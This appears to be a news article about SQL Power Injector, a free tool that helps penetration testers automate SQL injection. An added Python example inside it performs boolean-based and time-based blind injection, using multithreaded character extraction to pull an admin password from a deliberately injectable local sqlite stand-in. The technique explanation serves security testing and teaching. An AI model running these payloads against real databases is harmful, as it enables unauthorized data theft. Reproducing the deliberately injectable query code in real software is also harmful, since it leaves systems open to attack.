A new tool was released last week that helps penetration testers find SQL injection vulnerabilities.
Written by Francois Larouche, an independent application security professional, SQL Power Injector is a graphical .NET 1.1 application that helps penetration testers inject SQL commands into the parameters of a Web page.
For now it is SQL Server-, Oracle- and MySQL-compliant, but because the inline injection (Normal mode) simply sends whatever SQL you type, it can be used against any existing database management system (DBMS).
Inline SQL injection is a significant part of SQL Power Injector, but the tool's main strength is in the multithreaded automation of the injection. Not only is it possible to automate tedious and time-consuming queries, but you can also modify the query to get only what you want.
The automation can be done two ways: by comparing the expected result or by time delay. "The first way is generally compared against an error or a difference between a positive condition and a negative one, and the second way will turn out positive if the time delay sent to the server equals the one parameterized in the application," Larouche said in his announcement of the tool.
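The two blind-injection methods described above, and the multithreaded character-by-character automation the tool is built around, can be shown in a few dozen lines. The following is an added example written for this article, not SQL Power Injector's own code: an in-memory sqlite3 database stands in for the target DBMS (the tool itself targets SQL Server, Oracle and MySQL), `vulnerable_page` is a constructed stand-in for a Web page that concatenates a GET parameter into its query, and a registered `delay()` function imitates the server-side sleep primitives (MySQL `SLEEP()`, SQL Server `WAITFOR DELAY`, Oracle `DBMS_LOCK.SLEEP()`) that sqlite lacks. The sample table contents are constructed.

```python
"""Blind SQL injection automation: a boolean-based oracle (positive vs. negative
condition), a time-based oracle, and parallel binary-search extraction.
Added example; sqlite3 is only a stand-in for the target DBMS."""
import sqlite3
import threading
import time
from concurrent.futures import ThreadPoolExecutor

# --- Constructed vulnerable "web application" -------------------------------
_conn = sqlite3.connect(":memory:", check_same_thread=False)
_conn.execute("CREATE TABLE users (id INTEGER, name TEXT, password TEXT)")
_conn.execute("INSERT INTO users VALUES (1, 'admin', 's3cr3t')")   # constructed data
_conn.execute("INSERT INTO users VALUES (2, 'guest', 'guest')")


def _delay(seconds):
    """Stand-in for MySQL SLEEP() / SQL Server WAITFOR DELAY / Oracle DBMS_LOCK.SLEEP()."""
    time.sleep(seconds)
    return 1


_conn.create_function("delay", 1, _delay)
_lock = threading.Lock()  # one sqlite connection is shared by the worker threads


def vulnerable_page(article_id):
    """The page under test: the GET parameter is concatenated straight into SQL."""
    sql = f"SELECT name FROM users WHERE id = {article_id}"  # deliberately injectable
    with _lock:
        try:
            rows = _conn.execute(sql).fetchall()
        except sqlite3.Error:
            return "Error"  # the "compare against an error" case from the article
    return "Article found" if rows else "No article"


# --- Method 1: compare the response for a positive and a negative condition --
def make_boolean_oracle(request):
    """Return a predicate over SQL conditions, after checking that true and
    false conditions are actually distinguishable in the response."""
    positive = request("1 AND 1=1")
    negative = request("1 AND 1=2")
    if positive == negative:
        raise RuntimeError("true and false conditions give the same response; "
                           "boolean-based blind injection is not usable here")
    return lambda condition: request(f"1 AND ({condition})") == positive


# --- Method 2: the condition is true if the server took the configured delay --
def make_time_oracle(request, seconds=0.1):
    def oracle(condition):
        start = time.perf_counter()
        request(f"1 AND CASE WHEN ({condition}) THEN delay({seconds}) ELSE 0 END")
        return time.perf_counter() - start >= seconds * 0.8  # tolerate clock jitter
    return oracle


# --- Automation: binary search per character, positions resolved in parallel --
def blind_value(oracle, subquery, max_len=64, threads=8):
    """Recover the scalar result of `subquery` without ever seeing it in a page.
    Each character costs about 7 requests (binary search over printable ASCII)
    instead of ~95 guesses, and each position runs in its own worker thread.
    sqlite spelling is used: unicode()/substr()/length(); on MySQL and SQL
    Server use ASCII(SUBSTRING(x, pos, 1)), on Oracle ASCII(SUBSTR(x, pos, 1))."""
    def search(predicate, lo, hi):
        while lo < hi:  # invariant: the answer lies in [lo, hi]
            mid = (lo + hi) // 2
            if oracle(predicate(mid)):
                lo = mid + 1
            else:
                hi = mid
        return lo

    length = search(lambda m: f"length(({subquery})) > {m}", 0, max_len)

    def char_at(pos):
        return chr(search(lambda m: f"unicode(substr(({subquery}), {pos}, 1)) > {m}", 32, 126))

    with ThreadPoolExecutor(max_workers=threads) as pool:
        return "".join(pool.map(char_at, range(1, length + 1)))


if __name__ == "__main__":
    oracle = make_boolean_oracle(vulnerable_page)
    print(blind_value(oracle, "SELECT password FROM users WHERE name = 'admin'"))
    slow = make_time_oracle(vulnerable_page)
    print(slow("1=1"), slow("1=2"))
```

The calibration step in `make_boolean_oracle` is the check a tester wants before committing to hundreds of requests: if `1=1` and `1=2` produce the same page, the injection point is not boolean-blind and only the time-based oracle (or an inline technique) will work. The binary search is what makes "refine and get what you really want" practical over a blind channel, since a 6-character value costs about 50 requests rather than several hundred.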
Larouche said his goal was to make it as easy as possible to find and exploit a SQL injection vulnerability without having to use a browser. That is why, he said, an integrated browser displays the results of the injection parameterized in a way that any related standard SQL error will be displayed without the rest of the page.
"Another important part of this application is its power to get all the parameters you need to test the SQL injection, either by GET or POST method," Larouche said. With that, one won't need to use several applications or a proxy to intercept the data. Everything is automated, he said.
Larouche warned that SQL Power Injector won't find SQL injection vulnerabilities for you or find the right syntax if one is found. "Its main strength is to provide a way to find them more easily, and once they are found, to automate it in a way that you won't need to make every single injection if the only way to inject is using the blind technique," he said.
He also said he didn't intend to make the tool a database-pumping application. "There are plenty of good applications for that. In any case, much pumped data is not relevant, and since it takes time to pump, it can be a real waste of time. It's better to refine and get what you really want," he said.
Larouche acknowledged that there are other tools out there that do similar things, but he said SQL Power Injector differs in that it offers the following:
- Fine-tuning of the SQL injection parameters
- Time delay feature
- Multithread feature
- Response results in a customized browser
SQL Power Injector is available for free at http://www.sqlpowerinjector.com/download.htm. Note that it is Version 1 of the application, and Larouche is aware it has a few bugs. However, the tool is a work in progress and Larouche will constantly be updating it.